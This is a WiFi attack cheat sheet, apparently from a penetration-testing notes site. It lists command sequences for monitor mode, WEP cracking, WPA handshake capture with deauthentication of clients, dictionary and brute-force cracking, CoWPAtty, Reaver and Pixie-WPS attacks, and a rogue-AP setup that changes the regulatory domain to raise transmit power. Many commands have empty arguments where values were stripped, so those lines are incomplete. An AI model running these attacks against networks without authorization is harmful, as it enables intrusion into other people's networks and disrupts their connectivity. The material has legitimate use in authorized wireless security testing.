# WiFi Attacks {: .no\_toc } ## Table of contents {: .no\_toc .text-delta } 1. TOC {:toc} ## Basics List available interfaces ``` ip link show ``` List available interfaces ``` iwconfig ``` Kill annoying processes ``` airmon-ng check kill ``` Monitor mode ``` airmon-ng start wlan0 ``` Managed mode ``` airmon-ng stop wlan0mon ``` Scan (default 2.4Ghz) ``` airodump-ng wlan0mon ``` Scan 5Ghz ``` airodump-ng wlan0mon --band a ``` Put in mode monitor ``` iwconfig wlan0 mode monitor ``` Quit mode monitor - managed mode ``` iwconfig wlan0mon mode managed ``` Scan available wifis ``` iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" ``` ## WEP attack with aircrack-ng suite. ``` airmon-ng start wlan0 airodump-ng -c --bssid -w wlan0mon aireplay-ng -1 0 -e -a -h wlan0mon aireplay-ng -3 -b -h wlan0mon # ARP Replay aireplay-ng -0 1 -a -c wlan0mon aircrack-ng -0 ``` ``` airmon-ng start wlan0 airodump-ng -c --bssid -w wlan0mon aireplay-ng -1 0 -e -a -h wlan0mon aireplay-ng -5 -b -h wlan0mon packetforge-ng -0 -a -h -l -k -y -w tcpdump -n -vvv -e -s0 -r aireplay-ng -2 -r wlan0mon aircrack-ng -0 ``` ## WPA PSK attack with aircrack-ng suite. ``` airmon-ng start wlan0 airodump-ng -c --bssid -w wlan0mon aireplay-ng -0 1 -a -c wlan0mon aircrack-ng -0 -w ``` You can capture the handshake passively (it takes time) or de-authenticate a client. De-authentication attack ``` aireplay-ng --deauth 3 -a -c mon0 ``` Deauth every client ``` aireplay-ng -0 5 -a mon0 ``` ## Dictionary Attack ``` aircrack-ng -w passwords.lst capture-01.cap ``` ## Brute force Attack ``` crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap ``` ## CoWPAtty Attack Wordlist mode: ``` cowpatty -r -f -2 -s ``` PMK mode: ``` genpmk -f -d -s cowpatty -r -d -2 -s ``` ## Rogue Access Point Testing ``` # ifconfig wlan0 down # iw reg set BO # iwconfig wlan0 txpower 0 # ifconfig wlan0 up # airmon-ng start wlan0 # airodump-ng --write capture mon0 ifconfig wlan1 down iw reg set BO ifconfig wlan1 up iwconfig wlan1 channel 13 iwconfig wlan1 txpower 30 iwconfig wlan1 rate 11M auto ``` ## Reaver ``` airmon-ng start wlan0 airodump-ng wlan0 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 ``` ## Pixie WPS ``` airmon-ng check airmon-ng start wlan0 airodump-ng wlan0mon --wps reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 ```